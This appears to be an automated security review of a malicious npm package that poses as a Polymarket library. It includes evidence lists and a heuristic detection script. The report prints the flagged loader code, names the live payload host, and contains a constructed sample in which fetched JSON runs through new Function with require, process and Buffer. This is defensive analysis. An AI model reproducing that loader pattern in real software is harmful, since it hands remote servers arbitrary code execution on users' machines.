AI Security Review
scanned 4h ago · by lpm-firewall-ai
The package is a staged remote code execution loader. Its documented API fetches code from an unrelated host and runs it with access to Node globals and require.
Static reason
One or more suspicious static signals were detected; the source fingerprint signature matched a known malicious package; routed for review.
Trigger
User imports the package and calls the documented getPlugin() function.
Impact
Remote server can execute arbitrary Node.js code in the consumer process with dependency and process access.
Mechanism
Fetch remote JSON and execute the data.credits field with the Function constructor.
Attack narrative
A user following the README calls getPlugin(). The function requests https://svganchordev.net/icons/108 with a custom header, parses the JSON response, and passes data.credits to new Function together with require, process, global, Buffer, and the timer functions. That gives the remote endpoint arbitrary code execution in the consuming application's Node process.
Rationale
This is not package-aligned Polymarket functionality; it is a remote payload loader hidden behind icon/plugin wording and documented as normal initialization. Local source confirms arbitrary code execution from an unrelated endpoint, so this should be blocked.
Evidence
package.json, README.md, index.js
Network endpoints (2)
- svganchordev.net/icons/108
- cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/svgs/brands/
Decision evidence
public snapshot: AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js fetches https://svganchordev.net/icons/108 by default in exported getPlugin()
- index.js executes remote JSON field data.credits via new Function
- remote code receives require, process, global, Buffer, timers, and cwd-derived __dirname
- README.md instructs users to import and call getPlugin()
- package.json depends on dpapi, sqlite, machine-id, socket/request libraries unrelated to Polymarket API use
Evidence against
- package.json has no npm lifecycle hooks
- No import-time getPlugin() invocation found
- No direct filesystem writes or credential reads in local source before remote payload execution
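The mechanism and the evidence lists above amount to four static checks: network endpoints in the source, dynamic-code sinks and the privileged names handed to them, npm lifecycle hooks in package.json, and whether the sink is reachable at import time rather than only behind an exported call. The following is an added example, not the scanner's code and not the package's code, that runs those checks as text heuristics on a constructed sample package mimicking the reported shape (the host example.invalid and the function names are placeholders). A production scanner would walk an AST; this regex and brace-depth version is enough to show how each finding line is derived.

```javascript
// Added example (not from the scanner or the package): heuristic triage of
// an npm package for the "fetch JSON, new Function(..., data.field)" pattern.
const PRIVILEGED = ['require', 'module', 'process', 'global', 'Buffer', 'child_process'];
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish', 'prepublishOnly'];

// Every http(s) URL literal in the source, deduplicated.
function extractEndpoints(source) {
  const re = /https?:\/\/[A-Za-z0-9._-]+(?:\/[^\s'"`)]*)?/g;
  return Array.from(new Set(source.match(re) || []));
}

// npm lifecycle hooks that would run code at install time.
function lifecycleHooks(pkg) {
  return Object.keys(pkg.scripts || {}).filter(k => LIFECYCLE.includes(k));
}

// Brace depth at each character index, skipping single/double-quoted strings.
// Comments and template literals are not handled: triage heuristic, not a parser.
function braceDepths(src) {
  const out = new Array(src.length);
  let depth = 0, quote = null;
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    out[i] = depth;
    if (quote) {
      if (c === '\\' && i + 1 < src.length) { out[i + 1] = depth; i++; }
      else if (c === quote) quote = null;
      continue;
    }
    if (c === '"' || c === "'") quote = c;
    else if (c === '{') depth++;
    else if (c === '}') depth--;
  }
  return out;
}

// Dynamic-code sinks, with the privileged parameter names each one receives.
function findSinks(source) {
  const depths = braceDepths(source);
  const sinks = [];
  const re = /new\s+Function\s*\(([^)]*)\)|\beval\s*\(/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const names = m[1]
      ? (m[1].match(/['"]([A-Za-z_$][\w$]*)['"]/g) || []).map(s => s.slice(1, -1))
      : [];
    sinks.push({
      kind: m[0].startsWith('eval') ? 'eval' : 'new Function',
      index: m.index,
      depth: depths[m.index],
      privileged: names.filter(n => PRIVILEGED.includes(n)),
    });
  }
  return sinks;
}

// A sink fires on import if it sits at brace depth 0, or if a declared
// function whose body contains it is called at depth 0 (e.g. `getPlugin();`).
function sinkReachableAtImport(source, sinks) {
  const depths = braceDepths(source);
  if (sinks.some(s => s.depth === 0)) return true;
  const fnRe = /(?:async\s+)?function\s+([A-Za-z_$][\w$]*)\s*\(/g;
  let m;
  while ((m = fnRe.exec(source)) !== null) {
    const open = source.indexOf('{', m.index);
    if (open < 0) continue;
    const d = depths[open];
    let close = open + 1;
    while (close < source.length && depths[close] > d) close++;
    if (!sinks.some(s => s.index > open && s.index < close)) continue;
    const callRe = new RegExp('(?<!function\\s+)\\b' + m[1] + '\\s*\\(', 'g');
    let c;
    while ((c = callRe.exec(source)) !== null) {
      if (depths[c.index] === 0) return true;
    }
  }
  return false;
}

function triage(pkg, source) {
  const sinks = findSinks(source);
  const endpoints = extractEndpoints(source);
  const privilegedSink = sinks.some(s => s.privileged.length > 0);
  const verdict = privilegedSink && endpoints.length > 0 ? 'block: remote code loader'
    : privilegedSink ? 'review: dynamic code' : 'pass';
  return { endpoints, sinks, hooks: lifecycleHooks(pkg), importTime: sinkReachableAtImport(source, sinks), verdict };
}

// Constructed sample package mimicking the reported shape (placeholder host, not the real code).
const SAMPLE_PKG = { name: 'sample-plugin', version: '0.0.1', main: 'index.js', scripts: { test: 'node test.js' } };
const SAMPLE_SRC = `
const https = require('https');
async function getPlugin() {
  const data = await fetchJson('https://example.invalid/icons/108');
  const evalFn = new Function(
    'require', 'module', 'exports', '__dirname', '__filename', 'console', 'process', 'global', 'Buffer',
    data.credits
  );
  return evalFn(require, module, exports, __dirname, __filename, console, process, global, Buffer);
}
module.exports = { getPlugin };
`;

console.log(JSON.stringify(triage(SAMPLE_PKG, SAMPLE_SRC), null, 2));
```

On the sample this reports one new Function sink at depth 1 receiving require, module, process, global and Buffer, one remote endpoint, no lifecycle hooks and no import-time reachability, which is exactly the split between "evidence for block" and "evidence against" in the report: the payload is remote and privileged (block), but only runs when the documented API is called (no install-time trigger).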
Behavioral surface
Eval, Network
Source & flagged code
2 flagged · index.js
index.js, lines 149-151:
// Note: The code uses async/await, so we need to handle that
const evalFn = new Function(
  'require', 'module', 'exports', '__dirname', '__filename', 'console', 'process', 'global', 'Buffer', 'setTimeout', 'setInterval', 'clearTimeout', 'clearInterval', 'Promise',
High
matchType = malicious_source_fingerprint_signature
signature = c06bd55d669269cb
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = mdb-vite@1.5.2
matchedPath = index.js
matchedIdentity = npm:bWRiLXZpdGU:1.5.2
similarity = 1.000
shingleOverlap = 1
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
index.js
Findings
2 High, 1 Medium, 1 Low
- High: Eval (index.js)
- High: Known Malware Source Fingerprint Signature (index.js)
- Medium: Network
- Low: Scripts Present